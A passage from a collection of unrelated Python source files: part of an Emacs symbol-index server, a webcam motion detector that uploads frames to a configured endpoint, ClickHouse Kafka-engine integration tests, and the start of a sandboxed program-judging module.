    return [start, end, new_statement]
# Adds the specified path to symbol index.
@server.register_function
def add_path_to_index(*path):
    """Add one directory to the symbol index, if the index has been built."""
    global index
    directory = _stringify(path)
    if index is None:
        return "Index not ready. Hang on a second."
    index.build_index([directory])
    return 0
# Kick off the (slow) symbol-index build in the background, then publish the
# EPC port for the Emacs client and start serving requests forever.
build_index()
server.print_port()
server.serve_forever()
|
motion_detector.py | from threading import Thread
from queue import Queue
import numpy as np
import cv2
import requests
import json
import os, time
# Runtime settings come from a config.json file in the working directory.
with open('config.json', 'r') as f:
    config = json.load(f)
sd_thresh = config['detection']['threshold']  # std-dev threshold that counts as motion
upload_url = config['upload']['url']  # endpoint that receives detected frames
uid = config['upload']['uid']  # identifier sent along with each upload
skip_frames = config['detection']['skip_frames']  # frames to skip between uploads
frame_queue = Queue()  # frames pending upload, consumed by the sender thread
def dist_map(frame1, frame2):
    """Return a per-pixel motion map (uint8, 0-255) between two 3-channel frames.

    Each pixel is the Euclidean distance between the two frames' channel
    vectors, normalised by the maximum possible distance and scaled to 255.
    """
    delta = np.float32(frame1) - np.float32(frame2)
    squared_sum = delta[:, :, 0] ** 2 + delta[:, :, 1] ** 2 + delta[:, :, 2] ** 2
    max_distance = np.sqrt(255 ** 2 + 255 ** 2 + 255 ** 2)
    normalized = np.sqrt(squared_sum) / max_distance
    return np.uint8(normalized * 255)
def send_frame():
    """Worker loop: pull frames off the queue and POST them as JPEG uploads."""
    while True:
        img = frame_queue.get()
        print("Sending")
        _ok, encoded = cv2.imencode('.jpg', img)
        requests.post(upload_url,
                      files={'img': ('frame.jpg', encoded, 'image/jpeg')},
                      data={'uid': uid})
# Background uploader thread; daemonized so it dies with the main thread.
worker = Thread(target=send_frame)
worker.setDaemon(True)  # NOTE(review): deprecated alias for worker.daemon = True
worker.start()
print("Trying to connect to the camera")
# Retry until a capture device becomes available.
while True:
    cap = cv2.VideoCapture(0)
    if cap is None or not cap.isOpened():
        print("Retrying to connect")
        time.sleep(5)
    else:
        print("Connected")
        break
cap.set(cv2.CAP_PROP_FPS, config['capture']['fps'])
# Keep three consecutive frames; motion is measured between frame1 and frame3.
_, frame1 = cap.read()
_, frame2 = cap.read()
skip_count = 0
while True:
    try:
        _, frame3 = cap.read()
        # np.shape unpacking raises ValueError when the camera returns no frame.
        rows, cols, _ = np.shape(frame3)
        dist = dist_map(frame1, frame3)
        frame1 = frame2
        frame2 = frame3
    except ValueError:
        # NOTE(review): this spawns a new interpreter and then *continues*
        # the loop with a stale `dist` value — confirm intended behaviour.
        print("Restarting Script")
        os.system("python motion_detector.py")
    mod = cv2.GaussianBlur(dist, (9, 9), 0)
    _, thresh = cv2.threshold(mod, 100, 255, 0)
    _, stDev = cv2.meanStdDev(mod)
    # Upload every (skip_frames+1)-th motion frame to throttle traffic.
    if stDev > sd_thresh:
        if skip_count == skip_frames:
            skip_count = 0
            frame_queue.put(frame2)
        else:
            skip_count += 1
    if cv2.waitKey(1) & 0xFF == 27:  # ESC stops the loop
        break
cap.release()
cv2.destroyAllWindows()
|
test.py | import os.path as p
import random
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
# TODO: modify tests to respect `skip_broken_messages` setting.
cluster = ClickHouseCluster(__file__)
# Single ClickHouse instance wired to the dockerized Kafka broker.
instance = cluster.add_instance('instance',
                                main_configs=['configs/kafka.xml'],
                                with_kafka=True,
                                clickhouse_path_dir='clickhouse_path')
# Docker container id of the Kafka broker; filled in by the kafka_cluster fixture.
kafka_id = ''
# Helpers
def check_kafka_is_available():
    """Return True when the broker inside the Kafka container answers API queries."""
    # Local name `proc` avoids shadowing the module-level `os.path as p` alias.
    proc = subprocess.Popen(('docker',
                             'exec',
                             '-i',
                             kafka_id,
                             '/usr/bin/kafka-broker-api-versions',
                             '--bootstrap-server',
                             'INSIDE://localhost:9092'),
                            stdout=subprocess.PIPE)
    proc.communicate()
    return proc.returncode == 0
def wait_kafka_is_available(max_retries=50):
    """Block until the Kafka broker responds, polling once per second.

    Raises RuntimeError after *max_retries* failed probes.  The original did
    ``raise "Kafka is not available"``, which is itself a TypeError on
    Python 3 (exceptions must derive from BaseException).
    """
    retries = 0
    while not check_kafka_is_available():
        retries += 1
        if retries > max_retries:
            raise RuntimeError("Kafka is not available")
        print("Waiting for Kafka to start up")
        time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
    """Publish every item of *messages* to *topic* through the local broker."""
    producer = KafkaProducer(bootstrap_servers="localhost:9092")
    for payload in messages:
        producer.send(topic=topic, value=payload, timestamp_ms=timestamp)
    producer.flush()
    print("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
    """Yield the values of all messages currently available on *topic*."""
    consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
    # The original wrote topics=(topic): a *parenthesized string*, not a
    # tuple.  Pass an explicit single-element list instead.
    consumer.subscribe(topics=[topic])
    for toppar, messages in consumer.poll(5000).items():
        if toppar.topic == topic:
            for message in messages:
                yield message.value
    consumer.unsubscribe()
    consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
    """Publish varint-delimited KeyValuePair protobufs as one Kafka message.

    The accumulator must be bytes: both _VarintBytes() and
    SerializeToString() return bytes on Python 3, and concatenating them
    onto the original str accumulator (``data = ''``) raises TypeError.
    ``b''`` is equivalent on Python 2, so the fix is backward-compatible.
    """
    data = b''
    for i in range(start_index, start_index + num_messages):
        msg = kafka_pb2.KeyValuePair()
        msg.key = i
        msg.value = str(i)
        serialized_msg = msg.SerializeToString()
        data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
    producer = KafkaProducer(bootstrap_servers="localhost:9092")
    producer.send(topic=topic, value=data)
    producer.flush()
    print("Produced {} messages for topic {}".format(num_messages, topic))
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
    """Compare *result* against the reference TSV file next to this test.

    With check=True the comparison is asserted; otherwise its boolean
    result is returned so callers can poll until the data arrives.
    """
    fpath = p.join(p.dirname(__file__), ref_file)
    with open(fpath) as reference:
        matches = TSV(result) == TSV(reference)
        if check:
            assert matches
        else:
            return matches
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
    """Module-scoped fixture: start the cluster once, record the Kafka
    container id in the module-global kafka_id, and create the test DB."""
    try:
        global kafka_id
        cluster.start()
        kafka_id = instance.cluster.kafka_docker_id
        print("kafka_id is {}".format(kafka_id))
        instance.query('CREATE DATABASE test')
        yield cluster
    finally:
        cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
    """Per-test fixture: ensure a clean test.kafka table and a live broker."""
    instance.query('DROP TABLE IF EXISTS test.kafka')
    wait_kafka_is_available()
    print("kafka is available - running test")
    yield  # run test
    instance.query('DROP TABLE test.kafka')
# Tests
@pytest.mark.timeout(60)
def test_kafka_settings_old_syntax(kafka_cluster):
    """Kafka engine declared with the legacy positional-argument syntax."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka('kafka1:19092', 'old', 'old', 'JSONEachRow', '\\n');
        ''')
    # Don't insert malformed messages since old settings syntax
    # doesn't support skipping of broken messages.
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce('old', messages)
    result = ''
    # Poll until all produced rows are consumed (the timeout mark guards us).
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_settings_new_syntax(kafka_cluster):
    """Kafka engine declared via named SETTINGS; broken messages are skipped."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'new',
                     kafka_group_name = 'new',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n',
                     kafka_skip_broken_messages = 1;
        ''')
    messages = []
    for i in range(25):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce('new', messages)
    # Insert couple of malformed messages.
    kafka_produce('new', ['}{very_broken_message,'])
    kafka_produce('new', ['}another{very_broken_message,'])
    messages = []
    for i in range(25, 50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce('new', messages)
    result = ''
    # Poll until all valid rows (malformed ones skipped) are consumed.
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_csv_with_delimiter(kafka_cluster):
    """CSV-formatted messages with an explicit row delimiter."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'csv',
                     kafka_group_name = 'csv',
                     kafka_format = 'CSV',
                     kafka_row_delimiter = '\\n';
        ''')
    messages = []
    for i in range(50):
        messages.append('{i}, {i}'.format(i=i))
    kafka_produce('csv', messages)
    result = ''
    # Poll until all produced rows are consumed.
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_tsv_with_delimiter(kafka_cluster):
    """TSV-formatted messages with an explicit row delimiter."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'tsv',
                     kafka_group_name = 'tsv',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        ''')
    messages = []
    for i in range(50):
        messages.append('{i}\t{i}'.format(i=i))
    kafka_produce('tsv', messages)
    result = ''
    # Poll until all produced rows are consumed.
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_json_without_delimiter(kafka_cluster):
    """Multiple JSONEachRow rows packed into single Kafka messages, no delimiter."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'json',
                     kafka_group_name = 'json',
                     kafka_format = 'JSONEachRow';
        ''')
    # Each produced Kafka message carries 25 newline-separated JSON rows.
    messages = ''
    for i in range(25):
        messages += json.dumps({'key': i, 'value': i}) + '\n'
    kafka_produce('json', [messages])
    messages = ''
    for i in range(25, 50):
        messages += json.dumps({'key': i, 'value': i}) + '\n'
    kafka_produce('json', [messages])
    result = ''
    # Poll until all produced rows are consumed.
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_protobuf(kafka_cluster):
    """Varint-delimited protobuf messages decoded via the kafka.proto schema."""
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'pb',
                     kafka_group_name = 'pb',
                     kafka_format = 'Protobuf',
                     kafka_schema = 'kafka.proto:KeyValuePair';
        ''')
    # Produce 50 rows split over three batches of different sizes.
    kafka_produce_protobuf_messages('pb', 0, 20)
    kafka_produce_protobuf_messages('pb', 20, 1)
    kafka_produce_protobuf_messages('pb', 21, 29)
    result = ''
    # Poll until all produced rows are consumed.
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_materialized_view(kafka_cluster):
    """Rows flow from Kafka through a materialized view into a MergeTree table."""
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'mv',
                     kafka_group_name = 'mv',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce('mv', messages)
    # Poll the target table (not test.kafka) until all rows arrived.
    while True:
        result = instance.query('SELECT * FROM test.view')
        if kafka_check_result(result):
            break
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    kafka_check_result(result, True)
@pytest.mark.timeout(60)
def test_kafka_many_materialized_views(kafka_cluster):
    """Two materialized views consuming the same Kafka table both get all rows."""
    instance.query('''
        DROP TABLE IF EXISTS test.view1;
        DROP TABLE IF EXISTS test.view2;
        DROP TABLE IF EXISTS test.consumer1;
        DROP TABLE IF EXISTS test.consumer2;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'mmv',
                     kafka_group_name = 'mmv',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view1 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE TABLE test.view2 (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
            SELECT * FROM test.kafka;
        CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
            SELECT * FROM test.kafka;
    ''')
    messages = []
    for i in range(50):
        messages.append(json.dumps({'key': i, 'value': i}))
    kafka_produce('mmv', messages)
    # Poll both target tables until each has received the full data set.
    while True:
        result1 = instance.query('SELECT * FROM test.view1')
        result2 = instance.query('SELECT * FROM test.view2')
        if kafka_check_result(result1) and kafka_check_result(result2):
            break
    instance.query('''
        DROP TABLE test.consumer1;
        DROP TABLE test.consumer2;
        DROP TABLE test.view1;
        DROP TABLE test.view2;
    ''')
    kafka_check_result(result1, True)
    kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
    # Create batches of messages of size ~100Kb
    # Each list element becomes one Kafka message holding batch_messages JSON
    # documents concatenated back-to-back.
    # NOTE(review): there is no separator between the concatenated documents;
    # this relies on JSONEachRow accepting adjacent objects -- confirm.
    kafka_messages = 1000
    batch_messages = 1000
    messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
    kafka_produce('flush', messages)
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'flush',
                     kafka_group_name = 'flush',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 10;
        CREATE TABLE test.view (key UInt64, value String)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')
    client = KafkaAdminClient(bootstrap_servers="localhost:9092")
    received = False
    # Busy-wait until the consumer group has committed an offset equal to the
    # number of produced messages; the group coordinator may not be available
    # right after startup, hence the retry on that specific error.
    while not received:
        try:
            offsets = client.list_consumer_group_offsets('flush')
            for topic, offset in offsets.items():
                if topic.topic == 'flush' and offset.offset == kafka_messages:
                    received = True
                    break
        except kafka.errors.GroupCoordinatorNotAvailableError:
            continue
    # Then wait until every row has actually been flushed into the view.
    while True:
        result = instance.query('SELECT count() FROM test.view')
        if int(result) == kafka_messages*batch_messages:
            break
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(60)
def test_kafka_virtual_columns(kafka_cluster):
    # Virtual columns (_key, _topic, _offset, _partition, _timestamp) must be
    # selectable directly from the engine table.
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'virt1',
                     kafka_group_name = 'virt1',
                     kafka_format = 'JSONEachRow';
        ''')

    # Two single-message batches of 25 newline-separated rows each.  The
    # trailing 0 argument presumably pins the message timestamp so the
    # reference file stays reproducible -- confirm against kafka_produce.
    batch_one = ''.join(json.dumps({'key': n, 'value': n}) + '\n' for n in range(25))
    kafka_produce('virt1', [batch_one], 0)
    batch_two = ''.join(json.dumps({'key': n, 'value': n}) + '\n' for n in range(25, 50))
    kafka_produce('virt1', [batch_two], 0)

    # Accumulate query output until it matches the reference file.
    result = ''
    while not kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
        result += instance.query('SELECT _key, key, _topic, value, _offset, _partition, _timestamp FROM test.kafka', ignore_error=True)
    kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(60)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
    # Virtual columns must also be selectable from inside a materialized
    # view and land in ordinary columns of the target table.
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'virt2',
                     kafka_group_name = 'virt2',
                     kafka_format = 'JSONEachRow',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime))
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp as timestamp FROM test.kafka;
    ''')

    # 50 single-row messages; the trailing 0 presumably pins the message
    # timestamp for a reproducible reference -- confirm against kafka_produce.
    messages = [json.dumps({'key': n, 'value': n}) for n in range(50)]
    kafka_produce('virt2', messages, 0)

    result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
    while not kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
        result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(60)
def test_kafka_insert(kafka_cluster):
    # INSERTing into a Kafka engine table must produce messages that an
    # external consumer can read back.
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert1',
                     kafka_group_name = 'insert1',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        ''')

    # Rows (0,0) .. (49,49) as a single VALUES list.
    values = ','.join("({i}, {i})".format(i=n) for n in range(50))

    # Kafka INSERTs can time out transiently; retry until the write sticks.
    while True:
        try:
            instance.query("INSERT INTO test.kafka VALUES {}".format(values))
            break
        except QueryRuntimeException as e:
            if 'Local: Timed out.' in str(e):
                continue
            raise

    # Drain the topic until exactly the 50 produced rows have been seen.
    messages = []
    while True:
        messages.extend(kafka_consume('insert1'))
        if len(messages) == 50:
            break
    kafka_check_result('\n'.join(messages), True)
@pytest.mark.timeout(60)
def test_kafka_produce_consume(kafka_cluster):
    # Round trip: 16 threads INSERT through the Kafka engine table while a
    # materialized view consumes the same topic back into test.view.
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert2',
                     kafka_group_name = 'insert2',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        ''')
    messages_num = 10000
    def insert():
        # Each thread inserts the same 10000 rows as one VALUES list and
        # retries the INSERT on transient timeouts.
        values = []
        for i in range(messages_num):
            values.append("({i}, {i})".format(i=i))
        values = ','.join(values)
        while True:
            try:
                instance.query("INSERT INTO test.kafka VALUES {}".format(values))
                break
            except QueryRuntimeException as e:
                if 'Local: Timed out.' in str(e):
                    continue
                else:
                    raise
    threads = []
    threads_num = 16
    for _ in range(threads_num):
        threads.append(threading.Thread(target=insert))
    for thread in threads:
        time.sleep(random.uniform(0, 1))  # stagger thread start-up
        thread.start()
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')
    # Poll until rows from every thread have all been materialized.
    while True:
        result = instance.query('SELECT count() FROM test.view')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    for thread in threads:
        thread.join()
    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
    # Verifies that offsets are committed per written block: the Kafka table
    # is dropped and recreated mid-stream and no row may be consumed twice.
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'block',
                     kafka_group_name = 'block',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')
    cancel = threading.Event()
    # Single-element list so the producer closure can mutate the counter
    # and the main thread can read the final value.
    i = [0]
    def produce():
        # Keep producing batches of 101 sequentially-keyed rows until told
        # to stop.
        while not cancel.is_set():
            messages = []
            for _ in range(101):
                messages.append(json.dumps({'key': i[0], 'value': i[0]}))
                i[0] += 1
            kafka_produce('block', messages)
    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()
    # Wait until at least one block has been materialized, then stop producing.
    while int(instance.query('SELECT count() FROM test.view')) == 0:
        time.sleep(1)
    cancel.set()
    instance.query('''
        DROP TABLE test.kafka;
    ''')
    # Wait for the DROP to take effect before re-attaching with the same
    # consumer group.
    while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
        time.sleep(1)
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'block',
                     kafka_group_name = 'block',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_row_delimiter = '\\n';
    ''')
    # Wait until every produced key is present, then check for duplicates:
    # count() == uniqExact(key) iff nothing was consumed twice.
    while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
        time.sleep(1)
    result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    kafka_thread.join()
    assert result == 1, 'Messages from kafka get duplicated!'
if __name__ == '__main__':
    # Manual debugging entry point: keep the cluster alive until a key press.
    cluster.start()
    # raw_input exists only on Python 2; fall back to input() so the
    # interactive pause also works under Python 3.
    try:
        pause = raw_input
    except NameError:
        pause = input
    pause("Cluster created, press any key to destroy...")
    cluster.shutdown()
|
judge.py | import enum
import itertools
import os
import os.path
import queue
import shutil
import subprocess
import threading
import traceback
class IsolatedJobEnvironment:
    """Collects host->sandbox mount/copy instructions for an isolated job.

    Instructions are stored as (kind, host, virtual) tuples where kind is
    0 = directory bind, 1 = plain file copy, 2 = executable file copy
    (the codes IsolatedJob._run() dispatches on).
    """

    _DIRECTORY = 0
    _FILE = 1
    _EXE_FILE = 2

    def __init__(self):
        self._instructions = []

    def _add(self, kind, host, virtual):
        # Shared validation: virtual paths must be absolute so they map
        # unambiguously inside the sandbox root.
        if not virtual.startswith("/"):
            raise ValueError("Please use absolute virtual paths")
        self._instructions.append((kind, host, virtual))

    def add_directory(self, host, virtual):
        """Bind directory *host* at absolute sandbox path *virtual*."""
        self._add(self._DIRECTORY, host, virtual)

    def add_file(self, host, virtual):
        """Copy file *host* to absolute sandbox path *virtual*."""
        self._add(self._FILE, host, virtual)

    def add_exe_file(self, host, virtual):
        """Copy file *host* to *virtual* and mark it executable."""
        self._add(self._EXE_FILE, host, virtual)

    def _get_instructions(self):
        """Return the accumulated (kind, host, virtual) tuples."""
        return self._instructions
class JobResult(enum.Enum):
    """Outcome of an isolated job run.

    FL means a system (judge-side) failure.  Note that some backends may
    not support every verdict (e.g. ML).
    """

    OK = 0  # finished normally
    TL = 1  # time limit exceeded
    RE = 2  # runtime error (non-zero exit)
    SG = 3  # killed by a signal
    ML = 4  # memory limit exceeded
    FL = 5  # judge/system failure

    def ok(self):
        """True iff the job finished normally."""
        return self is JobResult.OK

    def ok_or_re(self):
        """True for a normal finish or an ordinary runtime error."""
        return self in (JobResult.OK, JobResult.RE)

    def is_fail(self):
        """True iff the judge itself failed."""
        return self is JobResult.FL
class SimpleJobLimits:
    """Mutable record of resource limits applied to a sandboxed job.

    Every limit defaults to "unlimited" (None) except proclimit, which
    defaults to a single process.
    """

    def __init__(self):
        self.timelimit = None       # CPU time budget, milliseconds
        self.timelimit_wall = None  # wall-clock budget, milliseconds
        self.memorylimit = None     # memory budget, kilobytes
        self.proclimit = 1          # max simultaneous processes

    def set_timelimit(self, tm):
        """Restrict overall computation (CPU) time to *tm* milliseconds."""
        self.timelimit = tm

    def set_timelimit_wall(self, tm):
        """Restrict real (wall-clock) time to *tm* milliseconds."""
        self.timelimit_wall = tm

    def set_proclimit(self, proc):
        """Allow up to *proc* simultaneous processes (default 1)."""
        self.proclimit = proc

    def set_memorylimit(self, mem):
        """Restrict memory usage to *mem* kilobytes."""
        self.memorylimit = mem

    def get_timelimit(self):
        """CPU time budget in ms, or None when unlimited."""
        return self.timelimit

    def get_timelimit_wall(self):
        """Wall-clock budget in ms, or None when unlimited."""
        return self.timelimit_wall

    def get_proclimit(self):
        """Maximum number of simultaneous processes."""
        return self.proclimit

    def get_memorylimit(self):
        """Memory budget in kb, or None when unlimited."""
        return self.memorylimit
class IsolatedJob:
    """One command execution inside an `isolate` sandbox box.

    Instances are created by IsolatedJudge.new_job() and executed on a judge
    worker thread via _work().  All result accessors block (through wait())
    until the job has finished or failed.
    """

    def __init__(self, judge, env, limits, *command, in_file=None, c_handler=None, c_args=None):
        from time import time
        self.__time = time()  # creation order; used by __lt__ for FIFO ties

        self._judge = judge
        self._env = env        # IsolatedJobEnvironment or None
        self._limits = limits  # SimpleJobLimits or None
        self._command = list(command)
        self._in_file = in_file      # optional host file copied to stdin
        self._c_handler = c_handler  # optional completion callback
        self._c_args = c_args        # args for the completion callback

        self._step = "pending"       # "pending" -> "init" -> "run"
        self._result = None          # JobResult; set exactly once
        self._timeusage = None       # CPU time, ms
        self._wallusage = None       # wall-clock time, ms
        self._memusage = None        # cgroup memory, kb
        self._failure_reason = None

        self._lock = threading.Lock()
        self._cv = threading.Condition(lock=self._lock)

        self._workdir = None         # isolate box working directory
        self._quite = False          # suppress per-run console output
        self._exitcode = None
        self._exitsig = None
        self._userdesc = None        # human-readable label for console output

    def set_quite(self):
        """Suppress the "isolate-run" console line for this job.

        Bug fix: this previously assigned `self.quite`, creating a brand-new
        attribute and leaving `self._quite` (the flag _run() checks) False,
        so the suppression never took effect.
        """
        self._quite = True

    def set_userdesc(self, desc):
        """Attach a human-readable description shown in console output."""
        self._userdesc = desc

    def _init(self, box_id):
        # Recreate the isolate box from scratch and remember its work dir.
        subprocess.check_call(["isolate", "--cleanup", "--cg", "--box-id={}".format(box_id)], timeout=10)
        self._workdir = subprocess.check_output(["isolate", "--init", "--cg", "--box-id={}".format(box_id)], timeout=10, universal_newlines=True).strip() + "/box"

    def _parse_result(self, isolate_meta):
        """Parse isolate's "key:value" meta output into this job's fields."""
        def parse_time(value):
            # Probably OK, but TODO
            return int(1000 * float(value))
        the_result = None
        for line in isolate_meta.split("\n"):
            if len(line) == 0:
                continue
            (key, value) = line.split(":", maxsplit=1)
            if key == "status":
                the_result = {"OK": JobResult.OK, "TO": JobResult.TL, "RE": JobResult.RE,
                              "SG": JobResult.RE, "XX": JobResult.FL}[value]
            if key == "time":
                self._timeusage = parse_time(value)
            if key == "time-wall":
                self._wallusage = parse_time(value)
            if key == "cg-mem":
                self._memusage = int(value)
            if key == "exitcode":
                self._exitcode = int(value)
                if self._exitcode == 0:
                    the_result = JobResult.OK
            if key == "exitsig":
                self._exitsig = value
                the_result = JobResult.SG
        if the_result is None:
            raise ValueError("Result not provided, responce was:\n" + isolate_meta)
        return the_result

    def _run(self, box_id):
        # Assemble the isolate command line: head (options), mid (mounts),
        # tail (the actual command after "--").
